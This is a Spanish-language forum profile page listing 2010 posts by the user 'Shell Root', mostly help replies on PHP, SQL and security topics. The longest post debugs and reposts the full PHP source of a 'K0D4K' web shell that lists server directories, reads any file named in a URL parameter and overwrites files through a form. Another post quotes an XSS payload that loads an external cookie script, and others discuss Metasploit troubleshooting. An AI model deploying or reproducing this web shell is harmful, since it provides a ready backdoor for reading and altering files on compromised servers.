Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

Páginas 1 ... 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 ... 368
#2701
PHP / Re: problema en codigo :(
1 Agosto 2010, 07:27 AM
El problema que tienes radica en la siguiente linea de código
Código (php) [Seleccionar]
if($_GET['shell'] == "archivo" or $_GET['path']!== "") {
Donde realizas una comparación con la variable GET path, que si se encuentra vacía, muestre ciertos echos. Es decir, cambia esa linea por está
Código (php) [Seleccionar]
if($_GET['shell'] == "archivo") {

Te dejo el código completo, un poco más ordenado.
Código (php) [Seleccionar]
<html>
<head>
<title> K0D4K Sh3LL! </title>
<style type="text/css">
body {
background-color:#000000;
cursor:crosshair;
font-family:monospace;
}
datitos{
color:FF0000;
font-weight:bold;
font-family:verdana;
font-size:15px;
}
carteles {
font-size:20px;
color:#FF8000;
font-weight:bold;
}
directorios{
font-size:small;
font-type:Comic Sans Ms;
font-color:red;
font-family:verdana;
font-weight:bold;
}
table{
font-size:13px;
border-collapse: collapse;
}
th{
border-right: 1px solid #000;
border-bottom: 1px solid #000;
padding: 0.5em;
background-color:#FF8000;
}
corchetes {
color:#FF0000;
font-family:verdana;
font-size:26px;
font-weight:bold;
font-style:italic;
}
signos {
font-weight:bold;
color:#FF8000;
font-size:24px;
}
k{
color:#FF0000;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
cero{
color:#FF8000;
font-size:23px;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
guion{
color:#FF8000;
font-size:25px;
}
a:link {
font-size:15px;
color:red;
text-decoration:none;
}
a:visited{
color:red;
text-decoration:none;
}
a:hover {
cursor:crosshair;
color:orange;
text-decoration:none;
font-size:16px;
}
datos{
font-size:medium;
color:#FF8000;
font-family:verdana;
}
</style>
<title> K0D4K Web Sh3LL! </title>
</head>
<body>
<center>
<corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
<k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k>   <guion>-</guion>   <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
 <br><br>     <center>

   <center>     <br><br>
<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">

<center>         <br>

<a href="?shell=archivo"> Ver Archivos </a><br>
<a href="?shell=datos"> Informacion Del Servidor </a><br>
<a href="?shell=phpinfo"> Link3</a>  <br>
<a href="?shell=creditos">Creditos</a>     <br>


</div></center></center>
<br>

<?php 
if(isset($_GET['path'])) {
 $path $_GET['path'];
 $dir dir($path);
 }else {
 $path getcwd();
 $dir dir($path);
 }

 if($_GET['shell'] == "archivo") {
 echo "<br>";
 echo "<div align=right>";
 echo "<table><tr>";
 echo "<th>Posicion:</th><th>";
 echo "$path";
 echo "</th>";
 echo "</table>";
 echo "</div>";
 echo "</chica>";
 echo "<br>";
 echo "<center>";
 echo "<carteles><br>";
 echo "Directorios:<br>";
 echo "</carteles>";
 $contador 0;
 while ($file $dir->read()) {
 $extension filetype($path."/".$file);
 if ($extension == "dir") {
 $contador+=1;
 $ruta urlencode($path."/".$file);
 echo "<directorios>";
 echo "<a href=?path=".$ruta.">".$file."</a><br>";
 }
 }
 echo "</directorios>";
 echo "<br><br><carteles>";
 echo "Archivos:";
 echo "</carteles><br>";
 $dir->rewind();
 $contador=0;
 while($file $dir->read()) {
 $extension=filetype($path."/".$file);
 if ($extension !=="dir"){
 $contador+=1;
 $ruta=urlencode($path."/".$file);
 echo "<directorios>";
 echo "<a href=?view=".$ruta.">".$file."</a><br>";
 }
 }

 if ($contador==0) {
 echo "No hay archivos en el directorio";
 }
 echo "<br><br>";
 echo "</center>";
 $dir->close();
 echo "</directorios>";
 
 if(isset($_GET['view'])) {
 $ruta $_GET['view'];
 echo "<h2><font color=orange><center>";
 echo "Editando: $ruta";
 echo "</font></center></h2>";
 echo "<center>";
 echo "<form method=POST action=\"\">";
 echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
 $abrir=fopen($ruta,"r");
 $texto fread($abrirfilesize($ruta));
 echo htmlentities($texto);
 echo "</textarea></div>";
  
 echo "<input type=submit name=\"Change\" value=\"Editar\">";
 echo "</form>";
 echo "</center>";
 if(isset($_POST['Change'])) {
 $arc=fopen($ruta"w+");
 $txt=$_POST['modi'];
 @$ok fwrite($arc,$txt);
 }
 }
 }

 if($_GET['shell']=="datos") {
 echo "<br><br><br>";
 $servers=$_SERVER['SERVER_SOFTWARE'];
 $ipserver=$_SERVER['SERVER_ADDR'];
 $lugarshell=$_SERVER['SCRIPT_FILENAME'];
 echo "<carteles>";
 echo "Datos del servidor:";
 echo "</carteles>";
 echo "<br><br><br>";
 echo "<datos>";
 echo "Version de software: ";
 echo "</datos>";
 echo "<datitos>";
 echo $servers;
 echo "</datitos>";
 echo "</info>";
 echo "<br>";
 echo "<datos>";
 echo "IP del servidor: ";
 echo "</datos>";
 echo "<datitos>";
 echo $ipserver;
 echo "</datitos>";
 echo "<br>";
 echo "<datos>";
 echo "Directorio shell: ";
 echo "</datos>";
 echo "<datitos>";
 echo $lugarshell;
 echo "</datitos>";
 }

 if($_GET['shell'] == "creditos") {
 header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
  
 }
?>
</body>
</html>
Edit: Tú WEBSHELL tiene XSS. xD
#2702
Bases de Datos / Re: ayuda en consulta SQL en acess 2007
1 Agosto 2010, 05:10 AM
Código (sql) [Seleccionar]
SELECT EMPLEADOS.ID_EMPLEADOS As 'Código', EMPLEADOS.APELLIDOS & ', ' & EMPLEADOS.NOMBRES As 'Nombre'
 FROM EMPLEADOS
WHERE ([CARGO] = 'Preventista');  
#2703
Nivel Web / Re: Problema con añadimiento en codigo
1 Agosto 2010, 02:13 AM
Cita de: frankitox en 31 Julio 2010, 23:57 PM
Código [Seleccionar]
http://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script>
Analiza ese código y comparalo con este ejemplo.
Código [Seleccionar]
<bHola</b>
Está bien cerrada la etiqueta?
#2704
Bugs y Exploits / Re: Fallo al conectar con metasploit!
31 Julio 2010, 21:08 PM
Cita de: summer2010 en 31 Julio 2010, 11:05 AMShell Root nunca dige que hice pings a loca,...
:silbar:
Cita de: summer2010 en 31 Julio 2010, 01:31 AM...tambien me intento conectar a otra red y nada,he hecho un ping a una blog de un amigo asi de ese modo e conseguido su ip para asi efectuar el atake pero el resultado es el mismo,...

Cita de: summer2010 en 31 Julio 2010, 11:05 AMTrankilo por eso soy moral ;)
:-X
#2705
Bugs y Exploits / Re: Fallo al conectar con metasploit!
31 Julio 2010, 02:28 AM
Ps no podes ir realizando pings a la loca a cualquier TARGET, se debe de realizar procedimientos detallados. Además de que cualquier TARGET no siempre es vulnerable o estan parcheados.
vease. Test de Penetración
#2706
Bugs y Exploits / Re: Fallo al conectar con metasploit!
31 Julio 2010, 01:23 AM
O no es vulnerable a ese exploit xD
#2707
Bugs y Exploits / Re: Fallo al conectar con metasploit!
30 Julio 2010, 22:47 PM
Hace mucho ratón que no toco el metasploit, pero podrías decidnos que exploit estas usando?. Además de printearnos la salida de un escaneo básico con NMAP
#2708
PHP / Re: [Script]Que me Falla?.
30 Julio 2010, 20:56 PM
wtf!
Código (php) [Seleccionar]
<php?
Es...
Código (php) [Seleccionar]
<?php

No veo la declaración de la función crear_semilla()
#2709
.NET (C#, VB.NET, ASP) / Re: problema MySQL vb.net
30 Julio 2010, 05:07 AM
El procedimiento que acabas de crear, pide como parámetro la DB y no la usas en ningún momento xD. Que valores les estas dando a los parámetros del procedimiento?
#2710
PHP / Re: ¿Donde puedo consegir un login basico y avanzado en php?
29 Julio 2010, 20:07 PM
:http://www.webcomparte.com/foro/programacion-en-php/tutorial-de-como-crear-un-sistema-usuarios/
Páginas 1 ... 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 ... 368